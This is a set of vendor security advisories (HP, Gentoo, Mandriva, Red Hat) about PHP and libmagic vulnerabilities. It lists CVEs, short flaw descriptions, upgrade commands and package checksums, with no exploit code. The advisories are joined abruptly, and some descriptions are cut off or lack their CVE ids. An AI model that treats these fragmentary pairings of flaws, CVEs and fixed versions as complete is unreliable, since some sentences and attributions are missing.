Bulletin, contact normal HP Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin
alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin Archive: A list of recently released Security Bulletins is
available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.
3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX
Copyright 2015 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors
or omissions contained herein. The information provided is provided "as is"
without warranty of any kind. To the extent permitted by law, neither HP or
its affiliates, subcontractors or suppliers will be liable for
incidental,special or consequential damages including downtime cost; lost
profits; damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice.
Hewlett-Packard Company and the names of Hewlett-Packard products referenced
herein are trademarks of Hewlett-Packard Company in the United States and
other countries. Other product and company names mentioned herein may be
trademarks of their respective owners.
Background
==========
PHP is a widely-used general-purpose scripting language that is
especially suited for Web development and can be embedded into HTML. Please review the
CVE identifiers referenced below for details.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All PHP 5.4 users should upgrade to the latest 5.5 stable branch, as
PHP 5.4 is now masked in Portage:
# emerge --sync
# emerge --ask --oneshot --verbose ">=dev=lang/php-5.5.33"
All PHP 5.5 users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=dev=lang/php-5.5.33"
All PHP 5.6 users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=dev=lang/php-5.6.19"
References
==========
[ 1 ] CVE-2013-6501
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-6501
[ 2 ] CVE-2014-9705
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9705
[ 3 ] CVE-2014-9709
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9709
[ 4 ] CVE-2015-0231
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0231
[ 5 ] CVE-2015-0273
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0273
[ 6 ] CVE-2015-1351
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-1351
[ 7 ] CVE-2015-1352
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-1352
[ 8 ] CVE-2015-2301
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2301
[ 9 ] CVE-2015-2348
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2348
[ 10 ] CVE-2015-2783
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2783
[ 11 ] CVE-2015-2787
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2787
[ 12 ] CVE-2015-3329
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-3329
[ 13 ] CVE-2015-3330
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-3330
[ 14 ] CVE-2015-4021
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4021
[ 15 ] CVE-2015-4022
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4022
[ 16 ] CVE-2015-4025
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4025
[ 17 ] CVE-2015-4026
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4026
[ 18 ] CVE-2015-4147
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4147
[ 19 ] CVE-2015-4148
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4148
[ 20 ] CVE-2015-4642
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4642
[ 21 ] CVE-2015-4643
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4643
[ 22 ] CVE-2015-4644
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4644
[ 23 ] CVE-2015-6831
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6831
[ 24 ] CVE-2015-6832
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6832
[ 25 ] CVE-2015-6833
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6833
[ 26 ] CVE-2015-6834
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6834
[ 27 ] CVE-2015-6835
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6835
[ 28 ] CVE-2015-6836
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6836
[ 29 ] CVE-2015-6837
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6837
[ 30 ] CVE-2015-6838
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6838
[ 31 ] CVE-2015-7803
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7803
[ 32 ] CVE-2015-7804
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7804
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
https://security.gentoo.org/glsa/201606-10
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2016 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
_______________________________________________________________________
Mandriva Linux Security Advisory MDVSA-2015:080
http://www.mandriva.com/en/support/security/
_______________________________________________________________________
Package : php
Date : March 28, 2015
Affected: Business Server 2.0
_______________________________________________________________________
Problem Description:
Multiple vulnerabilities has been discovered and corrected in php:
It was discovered that the file utility contains a flaw in the handling
of indirect magic rules in the libmagic library, which leads to an
infinite recursion when trying to determine the file type of certain
files (CVE-2014-1943).
A flaw was found in the way the file utility determined the type of
Portable Executable (PE) format files, the executable format used on
Windows. A malicious PE file could cause the file utility to crash or,
potentially, execute arbitrary code (CVE-2014-2270).
The BEGIN regular expression in the awk script detector in
magic/Magdir/commands in file before 5.15 uses multiple wildcards
with unlimited repetitions, which allows context-dependent attackers
to cause a denial of service (CPU consumption) via a crafted ASCII
file that triggers a large amount of backtracking, as demonstrated
via a file with many newline characters (CVE-2013-7345).
PHP FPM in PHP versions before 5.4.28 and 5.5.12 uses a UNIX domain
socket with world-writable permissions by default, which allows any
local user to connect to it and execute PHP scripts as the apache user
(CVE-2014-0185).
A flaw was found in the way file's Composite Document Files (CDF)
format parser handle CDF files with many summary info entries.
The cdf_unpack_summary_info() function unnecessarily repeatedly read
the info from the same offset. This led to many file_printf() calls in
cdf_file_property_info(), which caused file to use an excessive amount
of CPU time when parsing a specially-crafted CDF file (CVE-2014-0237).
A flaw was found in the way file parsed property information from
Composite Document Files (CDF) files. A property entry with 0 elements
triggers an infinite loop (CVE-2014-0238).
The unserialize() function in PHP before 5.4.30 and 5.5.14 has a Type
Confusion issue related to the SPL ArrayObject and SPLObjectStorage
Types (CVE-2014-3515).
It was discovered that PHP is vulnerable to a heap-based buffer
overflow in the DNS TXT record parsing. A malicious server or
man-in-the-middle attacker could possibly use this flaw to execute
arbitrary code as the PHP interpreter if a PHP application uses
dns_get_record() to perform a DNS query (CVE-2014-4049).
A flaw was found in the way file parsed property information from
Composite Document Files (CDF) files, where the mconvert() function did
not correctly compute the truncated pascal string size (CVE-2014-3478).
Multiple flaws were found in the way file parsed property information
from Composite Document Files (CDF) files, due to insufficient boundary
checks on buffers (CVE-2014-0207, CVE-2014-3479, CVE-2014-3480,
CVE-2014-3487).
The phpinfo() function in PHP before 5.4.30 and 5.5.14 has a Type
Confusion issue that can cause it to leak arbitrary process memory
(CVE-2014-4721).
file before 5.19 does not properly restrict the amount of data read
during a regex search, which allows remote attackers to cause a
denial of service (CPU consumption) via a crafted file that triggers
backtracking during processing of an awk rule, due to an incomplete
fix for CVE-2013-7345 (CVE-2014-3538). NOTE: this vulnerability exists because of an incomplete fix
for CVE-2012-1571 (CVE-2014-3587). NOTE:
this issue exists because of an incomplete fix for CVE-2014-4049
(CVE-2014-3597).
An integer overflow flaw in PHP's unserialize() function was
reported. If unserialize() were used on untrusted data, this
issue could lead to a crash or potentially information disclosure
(CVE-2014-3669).
A heap corruption issue was reported in PHP's exif_thumbnail()
function. A specially-crafted JPEG image could cause the PHP
interpreter to crash or, potentially, execute arbitrary code
(CVE-2014-3670).
If client-supplied input was passed to PHP's cURL client as a URL to
download, it could return local files from the server due to improper
handling of null bytes (PHP#68089).
An out-of-bounds read flaw was found in file's donote() function in the
way the file utility determined the note headers of a elf file. This
could possibly lead to file executable crash (CVE-2014-3710).
A use-after-free flaw was found in PHP unserialize(). An untrusted
input could cause PHP interpreter to crash or, possibly, execute
arbitrary code when processed using unserialize() (CVE-2014-8142).
sapi/cgi/cgi_main.c in the CGI component in PHP before 5.5.21, when
mmap is used to read a .php file, does not properly consider the
mapping's length during processing of an invalid file that begins
with a # character and lacks a newline character, which causes an
out-of-bounds read and might allow remote attackers to obtain sensitive
information from php-cgi process memory by leveraging the ability to
upload a .php file or trigger unexpected code execution if a valid
PHP script is present in memory locations adjacent to the mapping
(CVE-2014-9427).
Free called on an uninitialized pointer in php-exif in PHP before
5.5.21 (CVE-2015-0232).
The readelf.c source file has been removed from PHP's bundled copy of
file's libmagic, eliminating exposure to denial of service issues in
ELF file parsing such as CVE-2014-8116, CVE-2014-8117, CVE-2014-9620
and CVE-2014-9621 in PHP's fileinfo module.
S. Paraschoudis discovered that PHP incorrectly handled memory in
the enchant binding.
Taoguang Chen discovered that PHP incorrectly handled unserializing
objects.
It was discovered that PHP incorrectly handled memory in the phar
extension.
Use-after-free vulnerability in the process_nested_data function in
ext/standard/var_unserializer.re in PHP before 5.4.37, 5.5.x before
5.5.21, and 5.6.x before 5.6.5 allows remote attackers to execute
arbitrary code via a crafted unserialize call that leverages improper
handling of duplicate numerical keys within the serialized properties
of an object. NOTE: this vulnerability exists because of an incomplete
fix for CVE-2014-8142 (CVE-2015-0231).
An integer overflow flaw, leading to a heap-based buffer overflow,
was found in the way libzip, which is embedded in PHP, processed
certain ZIP archives. If an attacker were able to supply a specially
crafted ZIP archive to an application using libzip, it could cause
the application to crash or, possibly, execute arbitrary code
(CVE-2015-2331).
It was discovered that the PHP opcache component incorrectly handled
memory.
It was discovered that the PHP PostgreSQL database extension
incorrectly handled certain pointers.
PHP contains a bundled copy of the file utility's libmagic library,
so it was vulnerable to the libmagic issues. The libzip packages
has been patched to address the CVE-2015-2331 flaw.
A bug in the php zip extension that could cause a crash has been fixed
(mga#13820)
Additionally the jsonc and timezonedb packages has been upgraded to
the latest versions and the PECL packages which requires so has been
rebuilt for php-5.5.23.
_______________________________________________________________________
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7345
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0185
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0207
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0237
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0238
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1943
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2270
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3478
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3479
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3480
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3487
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3515
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3538
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3587
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3597
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3669
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3670
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3710
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4049
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4670
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4698
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4721
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8116
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8117
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8142
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9425
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9427
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9620
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9621
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9705
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0231
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0232
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0273
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1351
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1352
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2301
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2331
http://php.net/ChangeLog-5.php#5.5.9
http://php.net/ChangeLog-5.php#5.5.10
http://php.net/ChangeLog-5.php#5.5.11
http://php.net/ChangeLog-5.php#5.5.12
http://php.net/ChangeLog-5.php#5.5.13
http://php.net/ChangeLog-5.php#5.5.14
http://php.net/ChangeLog-5.php#5.5.15
http://php.net/ChangeLog-5.php#5.5.16
http://php.net/ChangeLog-5.php#5.5.17
http://php.net/ChangeLog-5.php#5.5.18
http://php.net/ChangeLog-5.php#5.5.19
http://php.net/ChangeLog-5.php#5.5.20
http://php.net/ChangeLog-5.php#5.5.21
http://php.net/ChangeLog-5.php#5.5.22
http://php.net/ChangeLog-5.php#5.5.22
http://php.net/ChangeLog-5.php#5.5.23
http://www.ubuntu.com/usn/usn-2535-1/
http://www.ubuntu.com/usn/usn-2501-1/
https://bugzilla.redhat.com/show_bug.cgi?id=1204676
http://advisories.mageia.org/MGASA-2014-0163.html
http://advisories.mageia.org/MGASA-2014-0178.html
http://advisories.mageia.org/MGASA-2014-0215.html
http://advisories.mageia.org/MGASA-2014-0258.html
http://advisories.mageia.org/MGASA-2014-0284.html
http://advisories.mageia.org/MGASA-2014-0324.html
http://advisories.mageia.org/MGASA-2014-0367.html
http://advisories.mageia.org/MGASA-2014-0430.html
http://advisories.mageia.org/MGASA-2014-0441.html
http://advisories.mageia.org/MGASA-2014-0542.html
http://advisories.mageia.org/MGASA-2015-0040.html
https://bugs.mageia.org/show_bug.cgi?id=13820
_______________________________________________________________________
Updated Packages:
Mandriva Business Server 2/X86_64:
a4e09575e26b690bd44801a126795ce9 mbs2/x86_64/apache-mod_php-5.5.23-1.mbs2.x86_64.rpm
e156aaf446f543279f758b767e5ce6f2 mbs2/x86_64/lib64php5_common5-5.5.23-1.mbs2.x86_64.rpm
cf1653dd6b3606ff8983739fe7728502 mbs2/x86_64/lib64zip2-0.11.2-1.1.mbs2.x86_64.rpm
2ed6c588ca428a502ab995726d497527 mbs2/x86_64/lib64zip-devel-0.11.2-1.1.mbs2.x86_64.rpm
91fd4a50d38c904247519a34f71ac9a7 mbs2/x86_64/libzip-0.11.2-1.1.mbs2.x86_64.rpm
0fad2aa8ca3bed422588c7d7c349e3e7 mbs2/x86_64/php-bcmath-5.5.23-1.mbs2.x86_64.rpm
b797a14554b170f1f2c307eebd5011ce mbs2/x86_64/php-bz2-5.5.23-1.mbs2.x86_64.rpm
83abadd87c78c719b585acbfcbf1f54a mbs2/x86_64/php-calendar-5.5.23-1.mbs2.x86_64.rpm
71b728b5c58335c37e9ee059a98179b5 mbs2/x86_64/php-cgi-5.5.23-1.mbs2.x86_64.rpm
d6047e2545b396ad29b2619c3d811b49 mbs2/x86_64/php-cli-5.5.23-1.mbs2.x86_64.rpm
933344ca17f96bd844db47c993b8ce1a mbs2/x86_64/php-ctype-5.5.23-1.mbs2.x86_64.rpm
0278a991ed7a7ea1d51c6651b1157744 mbs2/x86_64/php-curl-5.5.23-1.mbs2.x86_64.rpm
a3f172d95d061f6a2ba9ce562f1068ac mbs2/x86_64/php-dba-5.5.23-1.mbs2.x86_64.rpm
d239cccc6594bfe8169c0b5300ca1dd0 mbs2/x86_64/php-devel-5.5.23-1.mbs2.x86_64.rpm
73a234b9c369a20c349fca7f425b405a mbs2/x86_64/php-doc-5.5.23-1.mbs2.noarch.rpm
ab4caa5f1a397e2f267479f08616d027 mbs2/x86_64/php-dom-5.5.23-1.mbs2.x86_64.rpm
016b8d010a1866935f2a6889b712300c mbs2/x86_64/php-enchant-5.5.23-1.mbs2.x86_64.rpm
f9bd5f358336ea8a997f85f4d690fd40 mbs2/x86_64/php-exif-5.5.23-1.mbs2.x86_64.rpm
9f0ef885d5e7abb84c1b0c6242bd1a54 mbs2/x86_64/php-fileinfo-5.5.23-1.mbs2.x86_64.rpm
f551fc699944abdbd78cd1f74e1db713 mbs2/x86_64/php-filter-5.5.23-1.mbs2.x86_64.rpm
10c6ad89a0707acdff025ee0166b4361 mbs2/x86_64/php-fpm-5.5.23-1.mbs2.x86_64.rpm
fad5946e3ff8bf1d3b7215fee229b934 mbs2/x86_64/php-ftp-5.5.23-1.mbs2.x86_64.rpm
c74071a614cc4f8d5ac612736264aad2 mbs2/x86_64/php-gd-5.5.23-1.mbs2.x86_64.rpm
788e0972b5aa918a0c8ce2b0e30270a6 mbs2/x86_64/php-gettext-5.5.23-1.mbs2.x86_64.rpm
996120d4c1fa233bdb38aedf0718f593 mbs2/x86_64/php-gmp-5.5.23-1.mbs2.x86_64.rpm
e032d9a3c8e078242347623f1ff51b5a mbs2/x86_64/php-hash-5.5.23-1.mbs2.x86_64.rpm
c1da3a1898b05995091ad1c2237bdf6a mbs2/x86_64/php-iconv-5.5.23-1.mbs2.x86_64.rpm
37b4a5d86006024878d397a8478d5a42 mbs2/x86_64/php-imap-5.5.23-1.mbs2.x86_64.rpm
bd10d9a55ee8db73b4d80dae1e14e4e0 mbs2/x86_64/php-ini-5.5.23-1.mbs2.x86_64.rpm
4cb54cd72bd26728bb29f5d00a5174af mbs2/x86_64/php-interbase-5.5.23-1.mbs2.x86_64.rpm
2713dca82ad94d88b379db3fa012ed2d mbs2/x86_64/php-intl-5.5.23-1.mbs2.x86_64.rpm
f0a9187b81e038400dae4e01123b751c mbs2/x86_64/php-json-5.5.23-1.mbs2.x86_64.rpm
c395a0cb573d9432c9e4c2a4b92d1d0f mbs2/x86_64/php-ldap-5.5.23-1.mbs2.x86_64.rpm
f2374e34b874072d2268acf1c72b383a mbs2/x86_64/php-mbstring-5.5.23-1.mbs2.x86_64.rpm
7ca3ce3a9464933af1a147c206c25d0d mbs2/x86_64/php-mcrypt-5.5.23-1.mbs2.x86_64.rpm
dbe828f1c2caa3eef932fc0c14a7e2e9 mbs2/x86_64/php-mssql-5.5.23-1.mbs2.x86_64.rpm
995e9f09906309252d850618c3fffaa6 mbs2/x86_64/php-mysql-5.5.23-1.mbs2.x86_64.rpm
c474c1f1dc45f14ea5357092277d2f22 mbs2/x86_64/php-mysqli-5.5.23-1.mbs2.x86_64.rpm
cdcb4872386b83ef3969f918bf99f941 mbs2/x86_64/php-mysqlnd-5.5.23-1.mbs2.x86_64.rpm
cbb1652273fb07f216c50b8d1b5445c2 mbs2/x86_64/php-odbc-5.5.23-1.mbs2.x86_64.rpm
29ab61a3d1d00ad57c875d87b62d2e12 mbs2/x86_64/php-opcache-5.5.23-1.mbs2.x86_64.rpm
349f796a960ef2207b30a06e386f2653 mbs2/x86_64/php-openssl-5.5.23-1.mbs2.x86_64.rpm
7a7411900384da8741e32a3f6f8036c2 mbs2/x86_64/php-pcntl-5.5.23-1.mbs2.x86_64.rpm
ba3b14e45177b257ada03f7ff4b16deb mbs2/x86_64/php-pdo-5.5.23-1.mbs2.x86_64.rpm
ae5b57dbff67c7595e154313321ff693 mbs2/x86_64/php-pdo_dblib-5.5.23-1.mbs2.x86_64.rpm
8782f71797f7cb271a514b735b19621a mbs2/x86_64/php-pdo_firebird-5.5.23-1.mbs2.x86_64.rpm
ac39db58d4100f3d2d24593d3b5907fc mbs2/x86_64/php-pdo_mysql-5.5.23-1.mbs2.x86_64.rpm
210b990793c2d616fb0aecc4fde28eb6 mbs2/x86_64/php-pdo_odbc-5.5.23-1.mbs2.x86_64.rpm
6ae4df7959ddd3a8a0724ddddbe41a71 mbs2/x86_64/php-pdo_pgsql-5.5.23-1.mbs2.x86_64.rpm
1f9bdab81fa668dd583abe873892993e mbs2/x86_64/php-pdo_sqlite-5.5.23-1.mbs2.x86_64.rpm
f0cbb5dde255f5c8fa3e04e3a5314ab1 mbs2/x86_64/php-pgsql-5.5.23-1.mbs2.x86_64.rpm
e46ac8c820911a6091540e135f103154 mbs2/x86_64/php-phar-5.5.23-1.mbs2.x86_64.rpm
5050a745bfc3b1f5eeced2dd85f79721 mbs2/x86_64/php-posix-5.5.23-1.mbs2.x86_64.rpm
c9093134a518c07f4e8a188987f853d3 mbs2/x86_64/php-readline-5.5.23-1.mbs2.x86_64.rpm
2b48c3f35573e00b5ba4327e8edc05f2 mbs2/x86_64/php-recode-5.5.23-1.mbs2.x86_64.rpm
ae2157230db4d6e28698db384c8f7fcb mbs2/x86_64/php-session-5.5.23-1.mbs2.x86_64.rpm
2610a739bfa29ff11e648c7baa1d8bc3 mbs2/x86_64/php-shmop-5.5.23-1.mbs2.x86_64.rpm
b7999e11cf9d2ab510263e32cabaf312 mbs2/x86_64/php-snmp-5.5.23-1.mbs2.x86_64.rpm
ab665c30f0d2f13baa1c6475b7df7cac mbs2/x86_64/php-soap-5.5.23-1.mbs2.x86_64.rpm
f331837ba716316cef094765a1700101 mbs2/x86_64/php-sockets-5.5.23-1.mbs2.x86_64.rpm
134f8bb18790bd023e73919a794703a0 mbs2/x86_64/php-sqlite3-5.5.23-1.mbs2.x86_64.rpm
4b4aa44d0ac56629610bb0444f199df5 mbs2/x86_64/php-sybase_ct-5.5.23-1.mbs2.x86_64.rpm
fc69f644f36308d81f37f356b76e40a1 mbs2/x86_64/php-sysvmsg-5.5.23-1.mbs2.x86_64.rpm
981b7ef6715aacfe9250b206dbbbad31 mbs2/x86_64/php-sysvsem-5.5.23-1.mbs2.x86_64.rpm
91c006555173d03f1d25899947702673 mbs2/x86_64/php-sysvshm-5.5.23-1.mbs2.x86_64.rpm
62e5fa5fa8b4d89d7835f2f68169af14 mbs2/x86_64/php-tidy-5.5.23-1.mbs2.x86_64.rpm
0c5a9237c710dd098c8bb56018f7a142 mbs2/x86_64/php-timezonedb-2015.1-1.mbs2.x86_64.rpm
d94aa68a9ce76bce5c962c58f37ac5a5 mbs2/x86_64/php-tokenizer-5.5.23-1.mbs2.x86_64.rpm
317c7da32daa223560dc08bbae89d98d mbs2/x86_64/php-wddx-5.5.23-1.mbs2.x86_64.rpm
9b2cf90dfc6f6bdc0431a6f94d43a947 mbs2/x86_64/php-xml-5.5.23-1.mbs2.x86_64.rpm
0a1b6e0beeb36f24f9250a352fbff1e9 mbs2/x86_64/php-xmlreader-5.5.23-1.mbs2.x86_64.rpm
598925bc71347774e805b6fcfcbcf590 mbs2/x86_64/php-xmlrpc-5.5.23-1.mbs2.x86_64.rpm
49a1f8e773e98bb101488b805670651c mbs2/x86_64/php-xmlwriter-5.5.23-1.mbs2.x86_64.rpm
0b7c2f2fe7b3103631dd07d12d443e06 mbs2/x86_64/php-xsl-5.5.23-1.mbs2.x86_64.rpm
5cb68626d863213de934655dac8342c8 mbs2/x86_64/php-zip-5.5.23-1.mbs2.x86_64.rpm
a27bab106c0ba87f220ff35937210a63 mbs2/x86_64/php-zlib-5.5.23-1.mbs2.x86_64.rpm
3dd6a6eeb12c7207446053e4785d6974 mbs2/SRPMS/libzip-0.11.2-1.1.mbs2.src.rpm
5d69769d822628a5bf1485eaa1251b8e mbs2/SRPMS/php-5.5.23-1.mbs2.src.rpm
0a629c11ca23ba56d57f61a754def293 mbs2/SRPMS/php-timezonedb-2015.1-1.mbs2.src.rpm
_______________________________________________________________________
To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Moderate: php55 security and bug fix update
Advisory ID: RHSA-2015:1053-01
Product: Red Hat Software Collections
Advisory URL: https://rhn.redhat.com/errata/RHSA-2015-1053.html
Issue date: 2015-06-04
CVE Names: CVE-2014-8142 CVE-2014-9427 CVE-2014-9652
CVE-2014-9705 CVE-2014-9709 CVE-2015-0231
CVE-2015-0232 CVE-2015-0273 CVE-2015-1351
CVE-2015-1352 CVE-2015-2301 CVE-2015-2305
CVE-2015-2348 CVE-2015-2787 CVE-2015-4147
CVE-2015-4148
=====================================================================
1. Summary:
Updated php55 collection packages that fix multiple security issues and
several bugs are now available as part of Red Hat Software Collections 2.
Red Hat Product Security has rated this update as having Moderate security
impact. Common Vulnerability Scoring System (CVSS) base scores, which give
detailed severity ratings, are available for each vulnerability from the
CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 6) - x86_64
Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7) - x86_64
Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 6.5) - x86_64
Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 6.6) - x86_64
Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 6) - x86_64
Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7) - x86_64
3. Description:
PHP is an HTML-embedded scripting language commonly used with the Apache
HTTP Server. The php55 packages provide a recent stable release of PHP with
the PEAR 1.9.4, memcache 3.0.8, and mongo 1.4.5 PECL extensions, and a
number of additional utilities.
The php55 packages have been upgraded to upstream version 5.5.21, which
provides multiple bug fixes over the version shipped in Red Hat Software
Collections 1. (BZ#1057089)
The following security issues were fixed in the php55-php component:
An uninitialized pointer use flaw was found in PHP's Exif extension.
(CVE-2014-9705)
A heap buffer overflow flaw was found in PHP's regular expression
extension. (CVE-2015-2305)
A buffer over-read flaw was found in the GD library used by the PHP gd
extension.
An attacker able to trigger certain error condition in phar archive
processing could possibly use this flaw to disclose certain portions of
server memory. (CVE-2014-9652)
It was found that PHP move_uploaded_file() function did not properly handle
file names with a NULL character. (CVE-2015-2348)
A NULL pointer dereference flaw was found in PHP's pgsql extension. (CVE-2015-1352)
A flaw was found in the way PHP handled malformed source files when running
in CGI mode.
4. Solution:
Before applying this update, make sure all previously released errata
relevant to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
5. Package List:
Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 6):
Source:
php55-2.0-1.el6.src.rpm
php55-php-5.5.21-2.el6.src.rpm
x86_64:
php55-2.0-1.el6.x86_64.rpm
php55-php-5.5.21-2.el6.x86_64.rpm
php55-php-bcmath-5.5.21-2.el6.x86_64.rpm
php55-php-cli-5.5.21-2.el6.x86_64.rpm
php55-php-common-5.5.21-2.el6.x86_64.rpm
php55-php-dba-5.5.21-2.el6.x86_64.rpm
php55-php-debuginfo-5.5.21-2.el6.x86_64.rpm
php55-php-devel-5.5.21-2.el6.x86_64.rpm
php55-php-enchant-5.5.21-2.el6.x86_64.rpm
php55-php-fpm-5.5.21-2.el6.x86_64.rpm
php55-php-gd-5.5.21-2.el6.x86_64.rpm
php55-php-gmp-5.5.21-2.el6.x86_64.rpm
php55-php-imap-5.5.21-2.el6.x86_64.rpm
php55-php-intl-5.5.21-2.el6.x86_64.rpm
php55-php-ldap-5.5.21-2.el6.x86_64.rpm
php55-php-mbstring-5.5.21-2.el6.x86_64.rpm
php55-php-mysqlnd-5.5.21-2.el6.x86_64.rpm
php55-php-odbc-5.5.21-2.el6.x86_64.rpm
php55-php-opcache-5.5.21-2.el6.x86_64.rpm
php55-php-pdo-5.5.21-2.el6.x86_64.rpm
php55-php-pgsql-5.5.21-2.el6.x86_64.rpm
php55-php-process-5.5.21-2.el6.x86_64.rpm
php55-php-pspell-5.5.21-2.el6.x86_64.rpm
php55-php-recode-5.5.21-2.el6.x86_64.rpm
php55-php-snmp-5.5.21-2.el6.x86_64.rpm
php55-php-soap-5.5.21-2.el6.x86_64.rpm
php55-php-tidy-5.5.21-2.el6.x86_64.rpm
php55-php-xml-5.5.21-2.el6.x86_64.rpm
php55-php-xmlrpc-5.5.21-2.el6.x86_64.rpm
php55-runtime-2.0-1.el6.x86_64.rpm
php55-scldevel-2.0-1.el6.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 6.5):
Source:
php55-2.0-1.el6.src.rpm
php55-php-5.5.21-2.el6.src.rpm
x86_64:
php55-2.0-1.el6.x86_64.rpm
php55-php-5.5.21-2.el6.x86_64.rpm
